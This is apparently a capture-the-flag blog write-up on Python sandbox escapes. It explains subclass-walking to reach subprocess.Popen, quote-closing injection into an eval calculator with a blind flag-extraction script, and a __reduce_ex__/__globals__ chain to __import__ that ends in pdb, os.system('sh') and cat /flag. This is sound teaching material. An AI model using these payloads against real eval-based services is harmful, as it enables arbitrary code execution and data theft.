I Want to Become a PyJail Master

不是炒米线 | 2025-12-10 | 2025-12-25

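Example: Obtaining object

Here is the PyJail part of one challenge.

import subprocess # The original challenge does not import it this way; this is only for illustration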

def pyjail(code):
    blacklist = ['\\x','+','join', '"', "'", '[', ']', '2', '3', '4', '5', '6', '7', '8', '9']
    for i in blacklist:
        if i in code:
            return 'Invalid code'

    safe_globals = {'__builtins__':None, 'lit':list, 'dic':dict}
    print(repr(eval(code, safe_globals)))


payload = "{c.__name__:c for c in lit.__base__.__subclasses__()}.get(lit(dic(Popen=1)).pop())(lit((lit(dic(cat=1)).pop(),lit(dic(flag=1)).pop())),**dic(stdout=1-1-1)).communicate()"

pyjail(payload)

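Analysis:

{c.__name__:c for c in lit.__base__.__subclasses__()}: iterates over all direct subclasses of object (lit.__base__) and builds a dict whose keys are class names (strings) and whose values are the class objects.
.get(lit(dic(Popen=1)).pop()):
- dic(Popen=1) produces {'Popen': 1}.
- lit(...) turns it into the list ['Popen'].
- .pop() takes out the string 'Popen'.
So lit(dic(Popen=1)).pop() == 'Popen'.
.get(...) fetches the subprocess.Popen class from the dict built in the first step.

The result of {c.__name__:c for c in lit.__base__.__subclasses__()}.get(lit(dic(Popen=1)).pop()) is <class 'subprocess.Popen'>.

(...): instantiates the Popen class.
- lit((lit(dic(cat=1)).pop(), lit(dic(flag=1)).pop())): this is the first argument, args. The inner calls produce the strings 'cat' and 'flag', and the outer lit((...)) turns the tuple into the list ['cat', 'flag'].

This would already be enough, but if the output does not reach the terminal that eval runs in, nothing may be echoed back. The following trick turns the output into the return value of eval.

**dic(stdout=1-1-1): these are the kwargs. It produces {'stdout': -1} and unpacks it into Popen, which is equivalent to stdout=subprocess.PIPE.
.communicate(): runs the command and reads the result.

This gives the complete payload:

{c.__name__:c for c in lit.__base__.__subclasses__()}.get(lit(dic(Popen=1)).pop())(lit((lit(dic(cat=1)).pop(),lit(dic(flag=1)).pop())),**dic(stdout=1-1-1)).communicate()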
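The two building blocks of this payload, strings without quotes and the PIPE constant without banned digits, can be checked in isolation. This is a minimal sketch, assuming an ordinary CPython process in which subprocess has been imported; the variable names are mine and not part of the challenge.

```python
import subprocess

# Keyword names become dict keys, so a string appears without typing a quote.
name = list(dict(Popen=1)).pop()

# list.__base__ is object; map each of its direct subclasses by class name.
classes = {c.__name__: c for c in list.__base__.__subclasses__()}

# subprocess.PIPE is -1, which can be spelled using only the digit 1.
pipe_value = 1 - 1 - 1

print(name, classes.get(name), pipe_value == subprocess.PIPE)
```

The lookup only finds Popen because subprocess is already loaded in the process; a class that has never been imported does not show up in object's subclass list.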

Example: Closing the Quote

PyCalX 1

#!/usr/bin/env python3
import cgi;
import sys
from html import escape

FLAG = open('/var/www/flag','r').read()

OK_200 = """Content-type: text/html
(omitted; the page accepts three parameters: value1/op/value2)
"""

print(OK_200)
arguments = cgi.FieldStorage()

if 'source' in arguments:
    source = arguments['source'].value
else:
    source = 0

if source == '1':
    print('<pre>'+escape(str(open(__file__,'r').read()))+'</pre>')

if 'value1' in arguments and 'value2' in arguments and 'op' in arguments:

    def get_value(val):
        val = str(val)[:64]
        if str(val).isdigit(): return int(val)
        blacklist = ['(',')','[',']','\'','"'] # I don't like tuple, list and dict.
        if val == '' or [c for c in blacklist if c in val] != []:
            print('<center>Invalid value</center>')
            sys.exit(0)
        return val

    def get_op(val):
        val = str(val)[:2]
        list_ops = ['+','-','/','*','=','!']
        if val == '' or val[0] not in list_ops:
            print('<center>Invalid op</center>')
            sys.exit(0)
        return val

    op = get_op(arguments['op'].value)
    value1 = get_value(arguments['value1'].value)
    value2 = get_value(arguments['value2'].value)

    if str(value1).isdigit() ^ str(value2).isdigit():
        print('<center>Types of the values don\'t match</center>')
        sys.exit(0)

    calc_eval = str(repr(value1)) + str(op) + str(repr(value2))

    print('<div class=container><div class=row><div class=col-md-2></div><div class="col-md-8"><pre>')
    print('>>>> print('+escape(calc_eval)+')')

    try:
        result = str(eval(calc_eval))
        if result.isdigit() or result == 'True' or result == 'False':
            print(result)
        else:
            print("Invalid") # Sorry we don't support output as a string due to security issue.
    except:
        print("Invalid")


    print('>>> </pre></div></div></div>')

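This is a calculator that evals value1 + op + value2, with some restrictions:

value1 and value2 are truncated to 64 characters and must not contain any of ( ) [ ] ' "
The first character of op must be one of + - / * = !, and op is 1 or 2 characters long

Let's see how the code passed to eval is built:

calc_eval = str(repr(value1)) + str(op) + str(repr(value2))

A quick detour to get to know the repr function. The Runoob tutorial site says that repr() converts an object into a form that the interpreter can read.
Let's look at some concrete examples: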

>>> s = 'ChaoMixian'
>>> repr(s)
"'ChaoMixian'"

>>> s = ["ChaoMixian", "Loves", "Mixian"]
>>> repr(s)
"['ChaoMixian', 'Loves', 'Mixian']"

>>> s = 114514
>>> repr(s)
'114514'

>>> s = "1919810"
>>> repr(s)
"'1919810'"
>>> repr(int(s))
'1919810'

>>> repr(__import__("os"))
"<module 'os' (frozen)>"

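These examples make it clear: in one sentence, repr turns an object into a string. For PyJail challenges, though, what matters more is how repr treats different types of objects. For a string, the result of repr is automatically wrapped in ' single quotes. Thanks to this property we can borrow the idea from SQL injection and close the single quote early, so that the code we want gets executed.

Take this challenge as an example.
When value1=114, op=+ and value2=test, repr(value1) is '114' and repr(value2) is "'test'". Note the difference between int and str. (The real service rejects a number mixed with a string; the combination is used here only to show how repr behaves.)

calc_eval = str(repr(value1)) + str(op) + str(repr(value2))

Expanding the statement further gives:

calc_eval = str('114') + str('+') + str("'test'")

The final result is:

114+'test'

Recall how SQL injection works: by closing the quote early. We can do the same in a PyJail.

Back to the challenge: value1 and value2 strictly filter special characters, so we cannot close the quote there. But op can! Look closely at the restrictions on op: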

def get_op(val):
    val = str(val)[:2]
    list_ops = ['+','-','/','*','=','!']
    if val == '' or val[0] not in list_ops:
        print('<center>Invalid op</center>')
        sys.exit(0)
    return val

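As you can see, op is at most 2 characters long, and only val[0] is actually checked, i.e. only the first character has to be in the allowed list. This means the second character can be a ' single quote, used to close the string early.

We construct the input like this:

value1 = test
op = +'
value2 = chao

Now look at what calc_eval becomes:

calc_eval = str("'test'") + str("+'") + str("'chao'")

Expanding further gives

'test'+''chao'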
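The concatenation can be reproduced without the CGI wrapper. The helper below is a hypothetical stand-in for the challenge's get_value plus the calc_eval line; the blacklist and length checks are left out on purpose, so this is a sketch of the string building only.

```python
def build_calc_eval(value1, op, value2):
    """Rebuild the string the challenge passes to eval (filters omitted)."""
    def convert(val):
        # get_value() returns an int for digit-only input, otherwise the str
        return int(val) if val.isdigit() else val
    return repr(convert(value1)) + op + repr(convert(value2))

numbers = build_calc_eval("114", "+", "514")
strings = build_calc_eval("test", "+", "chao")
injected = build_calc_eval("test", "+'", "chao")

print(numbers)   # ints carry no quotes
print(strings)   # strs are wrapped in single quotes
print(injected)  # the quote smuggled in through op closes the string early
```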

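See it? The single quote in front of chao is closed by op's own single quote. At this point chao is effectively code that we control and inject, but one problem has to be solved first: neutralizing the trailing single quote. A common way is to comment it out with # (which this challenge does not ban). Something to think about here: what happens if value1 and value2 are integers?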

Let's try it out

value1 = test
op = +'
value2 =  and FLAG#

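Put the parameters into the statement:

calc_eval = str("'test'") + str("+'") + str("' and FLAG#'")

Expanding further

'test'+'' and FLAG#'

Because the # comments out the final single quote, the statement that eval actually runs is equivalent to:

'test' and FLAG

and returns the first falsy operand; if there is none, it returns the last operand. Here 'test' is non-empty and therefore truthy, so FLAG is output. Let's test it locally: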
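A local reproduction can be as small as the following sketch. The FLAG value is a made-up placeholder, and the namespace passed to eval is my own simplification of the script's module globals.

```python
FLAG = "flag{example}"  # hypothetical stand-in for the real flag

# value1 = test, op = +', value2 = " and FLAG#"
calc_eval = repr("test") + "+'" + repr(" and FLAG#")

# The trailing quote sits behind '#', so it is ignored as a comment.
result = eval(calc_eval, {"FLAG": FLAG})

print(calc_eval)
print(result)
```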


It really does print the flag! Yet when the same input is submitted to the target web service, it answers Invalid?


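Back to the source: we clearly cannot get past the isdigit check. But the challenge does allow True and False as output, which naturally brings SQL blind injection to mind, and a similar approach works here.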

result = str(eval(calc_eval))
if result.isdigit() or result == 'True' or result == 'False':
    print(result)
else:
    print("Invalid") # Sorry we don't support output as a string due to security issue.

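But how do we pass in our guess for the flag? value1 and value2 both filter quotes, so we cannot conjure a string out of thin air. Since both value1 and value2 are usable, though, we can let value1 be the guessed flag and value2 be the and clause that does the comparison. Inside the injected code, value1 is the script's own variable, which holds our guess. Let's try it.
Passing the following parameters returns True.

value1 = flag
op = +'
value2 =  and value1 in FLAG#

The space before and is optional.

Change value1 slightly into something that is certainly not part of the flag, such as flaga, and the return value becomes False. That confirms blind injection works, so we can write the exp script.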

import requests
url1="http://771ceb77-875c-403d-afa4-e2dd7b08c84f.node5.buuoj.cn:81/cgi-bin/pycalx.py?value1="
url2 = "&op=%2b'&value2=+and+True+and+value1+in+FLAG%23"

s='abcdefghijkmnlopqrstuvwxyz0123456789-}{'
flag='flag{'
while True:
    for i in s:
        url=url1+flag+i+url2
        r=requests.get(url).text
        print(url)
        if 'True\n>>>' in r: # True also appears in the echoed statement, so anchor on what follows it
            flag+=i
            print(flag)
            if i == '}':
                exit()
            break
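The same extraction loop can be exercised offline against a simulated oracle, which is handy for debugging before pointing it at the target. Everything here is an assumption made for illustration: the FLAG value, the oracle and recover helpers, and the alphabet.

```python
import string

FLAG = "flag{demo-1337}"  # hypothetical flag used only for this simulation

def oracle(guess):
    """Mimic the service: build calc_eval and report whether it prints True."""
    calc_eval = repr(guess) + "+'" + repr(" and value1 in FLAG#")
    result = str(eval(calc_eval, {"FLAG": FLAG, "value1": guess}))
    return result == "True"

def recover(prefix="flag{", alphabet=string.ascii_lowercase + string.digits + "-}{"):
    """Extend the known prefix one character at a time until '}' is reached."""
    known = prefix
    while not known.endswith("}"):
        for ch in alphabet:
            if oracle(known + ch):
                known += ch
                break
        else:
            # No candidate matched: stop instead of looping forever.
            raise RuntimeError("alphabet does not cover the flag")
    return known

print(recover())
```

Because in is a substring test rather than a prefix test, the known prefix flag{ is what keeps the search anchored at the start of the flag.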

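The flag is dynamic, so I won't post it. Here is another solution I saw elsewhere, which is basically the same: link

The principle is about the same, except that the guessed flag is passed in through the source parameter. source is what decides whether the source code is shown. It is a good reminder to pay attention to how global variables can be used in CTFs.

'test'+'' and source in FLAG#'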

Bonus question 🌚:

print(1 and True)     # True
print(0 and True)     # 0
print('0' and True)   # True, a non-empty string is truthy
print(0j and True)    # 0j, this is a complex number
print(0 and 114)      # 0
print("yes" and "no") # no

What about this one 🌚?

print(Love and NotLove)


PyCalX 2

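Compare the two versions to see what changed.

op = get_op(get_value(arguments['op'].value))

Just this one line: op now goes through the value WAF as well.

Now:

value1, value2 and op must not contain any of ( ) [ ] ' "
The first character of op must be one of + - / * = !, and op is 1 or 2 characters long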
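To see what the extra get_value call changes, the two versions of the op check can be compared side by side. This is a simplified sketch: the function names are mine, and the int conversion and sys.exit behaviour of the original are reduced to plain booleans.

```python
BLACKLIST = ['(', ')', '[', ']', '\'', '"']
LIST_OPS = ['+', '-', '/', '*', '=', '!']

def value_ok(val):
    """True if val survives the blacklist check of get_value()."""
    val = str(val)[:64]
    return val != '' and not any(c in val for c in BLACKLIST)

def op_ok_v1(op):
    """PyCalX 1: only the first character of op is checked."""
    op = str(op)[:2]
    return op != '' and op[0] in LIST_OPS

def op_ok_v2(op):
    """PyCalX 2: op goes through get_value() before get_op()."""
    return value_ok(op) and op_ok_v1(op)

print(op_ok_v1("+'"), op_ok_v2("+'"))
```

The op value +' that closed the quote in PyCalX 1 is now rejected, so the second character of op has to be something outside the blacklist.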

Magic Methods

Getting `__builtins__` via `__reduce_ex__`

Take the challenge 《关于我穿越到CTF的异世界这档事:终》 from ?CTF 2025 Week4 as an example

#!/usr/bin/env python3
import re

def prime_check(n: int) -> bool:
    if n < 2:
        return False
    for i in range(2, n):
        if n % i == 0:
            return False
    return True

ALLOWED = "abcdefghij0klmnopqrstuvwxyz:_.[]()<=,'"
print("Welcome to the Null Jail.想出去吗?你得先告诉我口令")
user_src = input("Tell me the Password: ")
filtered = ''.join(ch for ch in user_src if ch in ALLOWED)

if (
    len(filtered) > 150
    or not filtered.isascii()
    or "eta" in filtered
    or filtered.count("(") > 3
):
    print("没这么长，我看你是一点不懂哦")
    raise SystemExit

for m in re.finditer(r"\w+", filtered):
    if not prime_check(len(m.group(0))):
        print("这家伙在说什么呢。")
        raise SystemExit

eval(filtered, {'__builtins__': {}})

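"The main restrictions are no builtins, and that every variable name / number / underscore-containing token must have a prime length. With no builtins, the only way in is basically through the existing basic built-in types."

Here is the exp up front:

[bi:=00==000,ci:=bi<<bi,[].__reduce_ex__(ci)[00].__globals__['__built''ins__']['__imp''ort__']('pdb').run('asd')]

Now let's analyze this exp. Start a REPL:

>>> [].__reduce_ex__(2)[0]
<function __newobj__ at 0x101288fe0>

__reduce_ex__(protocol) uses a more advanced reconstruction scheme when protocol ≥ 2 (lower protocol versions do not support unpickling built-in types)

This challenge only allows the digit 0, so we need to build a number >= 2. The official writeup's approach: 0==0 returns True, which is 1, and 1<<1 shifts left by one bit to give 2. The walrus operator can be used inside eval to assign values on the fly.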
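The number construction can be tried on its own. A small sketch, with a sandbox dict of my own that mirrors the challenge's empty builtins:

```python
sandbox = {"__builtins__": {}}

# 00 and 000 are both valid spellings of zero, so 00==000 is True (i.e. 1);
# shifting 1 left by 1 gives 2. The list wrapper lets several walrus
# expressions share a single eval.
values = eval("[bi:=00==000, ci:=bi<<bi, ci]", sandbox)

print(values)
```

Only literals, comparison and shift operators are involved, so none of this needs anything from builtins.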

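The approach is mostly clear now, but why can [].__reduce_ex__(2)[0] be followed by __globals__ to reach the banned __builtins__? For that we need to understand __newobj__. Before that, I want to add a note on CPython's concept of namespaces.

What is a namespace?

In CPython, a namespace is a dict that maps names to objects.

For example:

A module's global variables form a namespace
A function's local variables form a namespace
A class body has its own namespace while it is being defined
The environments of eval and exec are namespaces too

Python looks up a name by searching dicts along a "scope chain":

Local namespace (locals)
Global namespace (globals)
Built-in namespace (builtins)

These three layers form a chain (enclosing function scopes, which sit between locals and globals, are left out here). They are searched from top to bottom, and if the name is not found anywhere a NameError is raised.

So the globals and locals in eval(expr, globals, locals) are the namespace dicts you temporarily hand to eval.

For example:

eval("x+1", {"x": 10})

The code executed inside can only access:
{"x": 10, "__builtins__": ...} (eval inserts __builtins__ automatically when the key is missing)

This is easy to understand: when a function runs, the interpreter gives it these three layers of namespaces. Thinking of Python's local and global variables, the intent of this design is not hard to see.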
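Both halves of that statement, the automatic __builtins__ entry and the effect of emptying it, can be observed directly. A minimal sketch with variable names of my own:

```python
namespace = {"x": 10}
result = eval("x+1", namespace)

# eval() adds a "__builtins__" entry to the globals dict when it is missing.
auto_added = "__builtins__" in namespace

# With an empty __builtins__, even len cannot be resolved any more.
try:
    eval("len('ab')", {"__builtins__": {}})
    blocked = False
except NameError:
    blocked = True

print(result, auto_added, blocked)
```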

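What is `__globals__`?

As mentioned above, there is a global namespace (globals). function.__globals__ gives access to the global namespace of the module in which that function was defined.

CPython functions fall into Python functions (function object) and C functions (builtin_function_or_method). Python functions always have __globals__, while C functions almost never do.

A Python function object is implemented at the C level as a struct named PyFunctionObject, which stores a pointer to its __globals__ dict. In other words, at the C level __globals__ is not a Python abstraction at all, just a field of that struct.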

>>> type(len)
<class 'builtin_function_or_method'>

>>> def f(): pass
... type(f)
<class 'function'>

Here we define a Python-level function and take a look:

>>> def f(): pass
... f
<function f at 0x103204d60>

>>> f.__globals__
{'__name__': '__main__', '__doc__': None, '__package__': '_pyrepl', '__loader__': None, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': '/Users/chao/miniconda3/lib/python3.13/_pyrepl/__main__.py', '__cached__': '/Users/chao/miniconda3/lib/python3.13/_pyrepl/__pycache__/__main__.cpython-313.pyc', 'f': <function f at 0x103204d60>}

Now try the built-in len function:

>>> len
<built-in function len>

>>> len.__globals__
Traceback (most recent call last):
  File "<python-input-11>", line 1, in <module>
    len.__globals__
AttributeError: 'builtin_function_or_method' object has no attribute '__globals__'

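Honestly, a look at vFlow's Kotlin layer and the context implementation of its Executor makes this easy to understand :D

Back to the topic: what can __globals__ be used for? Although the namespace given to eval has __builtins__ emptied out, every function carries the __globals__ of the module it was defined in, independent of the one handed to eval. So as long as we can find a Python-level function whose __globals__ is still an original, untouched namespace, we can reach __builtins__, and from there __import__ and everything else.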
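The idea can be shown with any Python-level function that is visible inside the jail. In this sketch the helper function and the sandbox dict are hypothetical; a real jail would not hand you such a function, which is why the rest of the post looks for one that is reachable from a literal.

```python
import builtins

def helper():  # hypothetical Python-level function defined outside the jail
    pass

sandbox = {"__builtins__": {}, "helper": helper}

# The jail's builtins are empty, but helper still points at its own globals.
found = eval("helper.__globals__['__builtins__']", sandbox)

# __builtins__ is the builtins module in __main__ and a plain dict elsewhere.
imp = found["__import__"] if isinstance(found, dict) else found.__import__

# C functions such as len expose no __globals__ to pivot through.
c_function_has_globals = hasattr(len, "__globals__")

print(imp is builtins.__import__, c_function_has_globals)
```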

>>> ''.__reduce_ex__
<built-in method __reduce_ex__ of str object at 0x102683c80>

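What is `__newobj__`?

This __reduce_ex__ is rather special, though: it is clearly implemented in C, so why does __reduce_ex__(2)[0] return a Python function (one that has __globals__)? Reading the source helps here. This behavior is in fact part of PEP 307.

The current latest CPython implementation is as follows: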

static PyObject *
object___reduce_ex___impl(PyObject *self, int protocol)
/*[clinic end generated code: output=2e157766f6b50094 input=f326b43fb8a4c5ff]*/
{
#define objreduce \
    (_Py_INTERP_CACHED_OBJECT(_PyInterpreterState_Get(), objreduce))
    PyObject *reduce, *res;

    if (objreduce == NULL) {
        PyObject *dict = lookup_tp_dict(&PyBaseObject_Type);
        objreduce = PyDict_GetItemWithError(dict, &_Py_ID(__reduce__));
        if (objreduce == NULL && PyErr_Occurred()) {
            return NULL;
        }
    }

    if (_PyObject_LookupAttr(self, &_Py_ID(__reduce__), &reduce) < 0) {
        return NULL;
    }
    if (reduce != NULL) {
        PyObject *cls, *clsreduce;
        int override;

        cls = (PyObject *) Py_TYPE(self);
        clsreduce = PyObject_GetAttr(cls, &_Py_ID(__reduce__));
        if (clsreduce == NULL) {
            Py_DECREF(reduce);
            return NULL;
        }
        override = (clsreduce != objreduce);
        Py_DECREF(clsreduce);
        if (override) {
            res = _PyObject_CallNoArgs(reduce);
            Py_DECREF(reduce);
            return res;
        }
        else
            Py_DECREF(reduce);
    }

    return _common_reduce(self, protocol);  // note this return
#undef objreduce
}

Next, follow _common_reduce:

/*
 * There were two problems when object.__reduce__ and object.__reduce_ex__
 * were implemented in the same function:
 *  - trying to pickle an object with a custom __reduce__ method that
 *    fell back to object.__reduce__ in certain circumstances led to
 *    infinite recursion at Python level and eventual RecursionError.
 *  - Pickling objects that lied about their type by overwriting the
 *    __class__ descriptor could lead to infinite recursion at C level
 *    and eventual segfault.
 *
 * Because of backwards compatibility, the two methods still have to
 * behave in the same way, even if this is not required by the pickle
 * protocol. This common functionality was moved to the _common_reduce
 * function.
 */
static PyObject *
_common_reduce(PyObject *self, int proto)
{
    PyObject *copyreg, *res;

    if (proto >= 2)     // we pass in 2
        return reduce_newobj(self);     // keep following this function

    copyreg = import_copyreg();
    if (!copyreg)
        return NULL;

    res = PyObject_CallMethod(copyreg, "_reduce_ex", "Oi", self, proto);
    Py_DECREF(copyreg);

    return res;
}

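As the comment explains, __reduce__ and __reduce_ex__ still have to behave the same way for backward compatibility, so their shared logic lives in _common_reduce. When protocol >= 2 it returns reduce_newobj(self). Following that function, focus on these statements: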

// ...
copyreg = import_copyreg();
// ...
newobj = PyObject_GetAttr(copyreg, &_Py_ID(__newobj__));
// ...

Now look at import_copyreg():

static PyObject *
import_copyreg(void)
{
    /* Try to fetch cached copy of copyreg from sys.modules first in an
       attempt to avoid the import overhead. Previously this was implemented
       by storing a reference to the cached module in a static variable, but
       this broke when multiple embedded interpreters were in use (see issue
       #17408 and #19088). */
    PyObject *copyreg_module = PyImport_GetModule(&_Py_ID(copyreg));
    if (copyreg_module != NULL) {
        return copyreg_module;
    }
    if (PyErr_Occurred()) {
        return NULL;
    }
    return PyImport_Import(&_Py_ID(copyreg));
}

In other words, it looks up the attribute __newobj__ in the Python module copyreg. Let's go to Lib/copyreg.py for the actual implementation.

# Helper for __reduce_ex__ protocol 2

def __newobj__(cls, *args):
    return cls.__new__(cls, *args)

def __newobj_ex__(cls, args, kwargs):
    """Used by pickle protocol 4, instead of __newobj__ to allow classes with
    keyword-only arguments to be pickled correctly.
    """
    return cls.__new__(cls, *args, **kwargs)

At this point everything is clear. __newobj__ is indeed a Python-level function.
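The two branches of _common_reduce can also be observed from Python. This sketch assumes CPython; Plain is a hypothetical user-defined class that only serves to show the protocol < 2 branch.

```python
import copyreg
import types

class Plain:  # hypothetical user-defined class, used only for comparison
    pass

# proto < 2 is delegated to copyreg._reduce_ex, which returns _reconstructor
old_style = Plain().__reduce_ex__(1)[0]

# proto >= 2 goes through reduce_newobj, which fetches copyreg.__newobj__
new_style = [].__reduce_ex__(2)[0]

print(old_style.__name__, new_style.__name__)
print(isinstance(new_style, types.FunctionType))
```

Both callables live in Lib/copyreg.py, so both are ordinary Python functions with a __globals__ attribute.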

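Back to the challenge. From the analysis above, when __builtins__ is banned we can look for a function and reach __builtins__ through its __globals__.

Earlier explorers happened to find [].__reduce_ex__(2)[0], which returns exactly __newobj__ and fits these conditions perfectly. The chain also has few dependencies, so it works in most scenarios (and there is no index to guess).

So the actual call chain is:

[].__reduce_ex__(2) returns a tuple
tuple[0] is the "object constructor" helper __newobj__, a Python-level function from copyreg
__newobj__ has its own __globals__
__globals__ contains the real __builtins__
__builtins__ contains __import__, which imports modules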
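The chain can be run end to end inside an eval with empty builtins. In this sketch the os module is imported only as a harmless demonstration target, and the digit 2 and unsplit strings are used because the challenge's character filters are not being simulated here.

```python
chain = (
    "[].__reduce_ex__(2)[0]"           # copyreg.__newobj__
    ".__globals__['__builtins__']"     # builtins dict of the copyreg module
    "['__import__']('os')"             # import any module from there
)

module = eval(chain, {"__builtins__": {}})
print(module.__name__)
```

The subscript on __builtins__ works because, for an imported module such as copyreg, that entry is a plain dict rather than the builtins module object.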

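Building the payload

This part is not really the focus of this post; it is more of a collection of tricks.

Since the only digit available is 0 and we want a protocol version >= 2 in __reduce_ex__ (lower versions do not support unpickling built-in types), the shift operator is left available to get 2. In Python bool and int can be used together in arithmetic, so 0==0 gives 1, and shifting it left by 1 gives 2.

Because plain assignment is not supported inside eval, the walrus operator := is used instead, and the walrus expressions have to be wrapped in [] to be parsed as one valid expression.

The challenge also has a prime-length restriction and a limit on the number of left parentheses; see the official writeup for details.

The final solution for this challenge uses pdb

[bi:=00==000,ci:=bi<<bi,[].__reduce_ex__(ci)[00].__globals__['__built''ins__']['__imp''ort__']('pdb').run('asd')]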
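Whether a candidate payload passes the filters can be checked offline by reusing the challenge's own rules. The sketch below copies ALLOWED, prime_check and the regex from the source above; the passes_filters wrapper is a hypothetical helper of mine and does not run the payload.

```python
import re

ALLOWED = "abcdefghij0klmnopqrstuvwxyz:_.[]()<=,'"

def prime_check(n: int) -> bool:
    if n < 2:
        return False
    for i in range(2, n):
        if n % i == 0:
            return False
    return True

def passes_filters(src: str) -> bool:
    """Apply the challenge's length, 'eta', parenthesis and prime checks."""
    filtered = ''.join(ch for ch in src if ch in ALLOWED)
    if filtered != src:            # something would be silently stripped
        return False
    if len(filtered) > 150 or "eta" in filtered or filtered.count("(") > 3:
        return False
    return all(prime_check(len(m.group(0))) for m in re.finditer(r"\w+", filtered))

payload = ("[bi:=00==000,ci:=bi<<bi,[].__reduce_ex__(ci)[00].__globals__"
           "['__built''ins__']['__imp''ort__']('pdb').run('asd')]")
tokens = re.findall(r"\w+", payload)

print(passes_filters(payload))
print([(t, len(t)) for t in tokens])
```

Splitting '__builtins__' into '__built''ins__' is what turns a 12-character token into tokens of length 7 and 5, and adjacent string literals are concatenated by the parser for free.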

Once inside pdb, arbitrary Python code can be executed.

import os
os.system('sh')
cat /flag